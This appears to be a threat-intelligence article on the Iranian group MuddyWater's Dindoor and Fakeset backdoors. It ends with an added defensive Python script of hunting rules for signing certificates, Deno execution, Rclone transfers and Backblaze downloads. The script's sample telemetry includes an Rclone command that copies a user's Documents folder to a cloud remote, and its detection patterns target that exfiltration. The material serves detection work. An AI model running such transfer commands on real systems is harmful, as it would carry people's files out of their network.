Several U.S. organizations have been compromised by the Iranian hacking group known as MuddyWater. The campaign began in early February and has continued after the U.S. and Israeli military actions against Iran.
The activity was uncovered by the Threat Hunter Team at Broadcom's Symantec and Carbon Black, which identified targets including a U.S. bank, a U.S. airport, and several non-governmental organizations operating in the United States and Canada. The Israeli branch of a U.S. software company that serves the defense and aerospace industries also saw suspicious network activity. The findings were published by the Threat Hunter Team on March 5.
At the center of the campaign is a previously undocumented backdoor that researchers have named "Dindoor". It was found running on the networks of many of the affected organizations.
Dindoor is notable for how it runs: the malicious logic is a script executed by Deno, a legitimate runtime for JavaScript and TypeScript. Because the process on disk is an ordinary interpreter rather than a bespoke executable, controls that judge the binary alone have little to go on; defenders have to look at which script the runtime is handed, where it lives, and what it connects to. The backdoor was also signed with a code-signing certificate issued in the name "Amy Cherne". A valid signature lends the file a veneer of legitimacy, but the signer name is also a concrete indicator that defenders can hunt on.
Investigators also observed an attempted theft of data from the software company's Israeli branch, carried out with Rclone, an open-source command-line tool for copying and syncing files to cloud storage providers. How much data, if any, left the network is unknown, but the attempt shows that sensitive information was at risk.
A second backdoor, "Fakeset", was found on the U.S. airport's network. It was signed with certificates in the names "Amy Cherne" and "Donald Gay". The Donald Gay certificate matters because it has previously appeared on malware attributed to MuddyWater. The group, also tracked as Seedworm and TEMP.Zagros, has been active since 2017 and is believed to be linked to Iran's Ministry of Intelligence and Security.
Fakeset was downloaded from two servers operated by the cloud storage provider Backblaze. Hosting payloads on a mainstream cloud service is a deliberate choice rather than a lapse by the provider: the download comes from a domain with a good reputation, so it is unlikely to be blocked on reputation alone and blends into ordinary outbound traffic. The Donald Gay certificate has also been seen on malware tracked as Stagecomp, a downloader for the Darkcomp backdoor. These overlaps indicate that MuddyWater reuses its signing infrastructure across tools, which is exactly what makes the certificates useful for attribution and detection.
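To turn the tradecraft above (campaign signer names, Deno as the execution vehicle, Rclone for exfiltration, Backblaze for payload hosting) into something that can be run against endpoint telemetry, here is a small set of hunting rules in Python. This is an added example, not code from the Threat Hunter Team or from the article. The event schema, the sample paths and hostnames, the developer-path heuristic for Deno, and the Backblaze domain pattern are all assumptions made for the example.

```python
"""Hunting rules for the MuddyWater tradecraft described above.

Added example, not code from the Threat Hunter Team or from the article. It runs
four rules over constructed, Sysmon-style events: the campaign's code-signing
subjects, Deno executing scripts outside a developer workspace, Rclone pushing
data to a configured remote, and downloads from Backblaze-hosted storage. Event
field names, sample paths and hostnames, and the heuristics are assumptions.
"""
import re
from pathlib import PureWindowsPath

# Signer subjects reported for Dindoor and Fakeset.
CAMPAIGN_SIGNERS = ("Amy Cherne", "Donald Gay")

# Rclone verbs that move data, and its "remote:path" argument syntax
# (remote names are at least two characters, so "C:\..." does not match).
RCLONE_TRANSFER_VERB = re.compile(r"\b(copy|copyto|sync|move|moveto)\b", re.I)
RCLONE_REMOTE_ARG = re.compile(r"(?:^|\s)[A-Za-z][\w-]+:\S*")

# Backblaze-operated hosts (assumption: B2 endpoints under backblazeb2.com).
BACKBLAZE_HOST = re.compile(r"(^|\.)backblaze(b2)?\.com$", re.I)

# Assumed developer workspace paths where Deno is expected to run.
DEV_PATH = re.compile(r"\\(src|repos|projects)\\", re.I)


def _basename(image: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return PureWindowsPath(image).name.lower()


def triage_event(ev: dict) -> list[str]:
    """Return the names of the rules that fire for one event."""
    hits = []
    if ev.get("type") == "process":
        name = _basename(ev.get("image", ""))
        cmd = ev.get("command_line", "")
        signer = ev.get("signer", "").lower()

        # Rule 1: executable signed with a certificate tied to the campaign.
        if any(s.lower() in signer for s in CAMPAIGN_SIGNERS):
            hits.append("campaign_signer")

        # Rule 2: Deno running a script outside an assumed developer path.
        # Baseline first: build hosts and engineering workstations run Deno legitimately.
        if name in ("deno", "deno.exe") and not DEV_PATH.search(cmd):
            hits.append("deno_runtime_exec")

        # Rule 3: Rclone transferring data to a remote, the exfiltration pattern.
        if name in ("rclone", "rclone.exe") and RCLONE_TRANSFER_VERB.search(cmd) \
                and RCLONE_REMOTE_ARG.search(cmd):
            hits.append("rclone_remote_transfer")

    elif ev.get("type") == "network":
        # Rule 4: connection to Backblaze storage; Fakeset was fetched from Backblaze servers.
        # Allow-list your own backup client before alerting on this.
        if BACKBLAZE_HOST.search(ev.get("dest_host", "")):
            hits.append("backblaze_fetch")
    return hits


def triage(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Index and rule hits for every event that fired at least one rule."""
    return [(i, h) for i, ev in enumerate(events) if (h := triage_event(ev))]


# Constructed sample telemetry; none of these paths or hosts come from the article.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\ProgramData\svc\deno.exe",
     "command_line": r"deno.exe run -A C:\ProgramData\svc\update.ts",
     "signer": "CN=Amy Cherne"},
    {"type": "process", "image": r"C:\Users\dev\.deno\bin\deno.exe",
     "command_line": r"deno run --allow-net C:\repos\app\main.ts", "signer": ""},
    {"type": "process", "image": r"C:\Windows\Temp\rclone.exe",
     "command_line": r'rclone.exe copy "C:\Users\j.doe\Documents" b2:bkt-7/docs --transfers 16',
     "signer": ""},
    {"type": "network", "image": r"C:\ProgramData\svc\deno.exe",
     "dest_host": "f003.backblazeb2.com", "dest_port": 443},
    {"type": "network", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dest_host": "www.example.com", "dest_port": 443},
]

if __name__ == "__main__":
    for idx, rules in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(rules)}")
```

Two caveats when adapting this: the signer rule keys on subject strings only, and a subject name is trivially reused by anyone, so pair it with the certificate thumbprints from the vendor report where available; and rules 2 and 4 will fire on legitimate Deno use and on a legitimate Backblaze backup client until you baseline where each is expected in your environment.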
Neither Stagecomp nor Darkcomp was found on the affected networks, but the reuse of the same certificates across samples points firmly to MuddyWater. The Threat Hunter Team has said that while some intrusions were disrupted, other organizations may still be compromised or exposed to the same tradecraft. Organizations in sectors with critical economic or national-security roles should treat this as an active threat rather than a closed incident.
Practical steps follow directly from what was observed: inventory where Deno and Rclone are legitimately used and alert on executions elsewhere, check the code-signing subjects of recently introduced executables against the names reported here, and review outbound transfers to cloud storage providers the business does not use. As the geopolitical situation develops, the overlap between military action and cyber operations is likely to grow, and defenses need to keep pace with adversaries of this caliber.
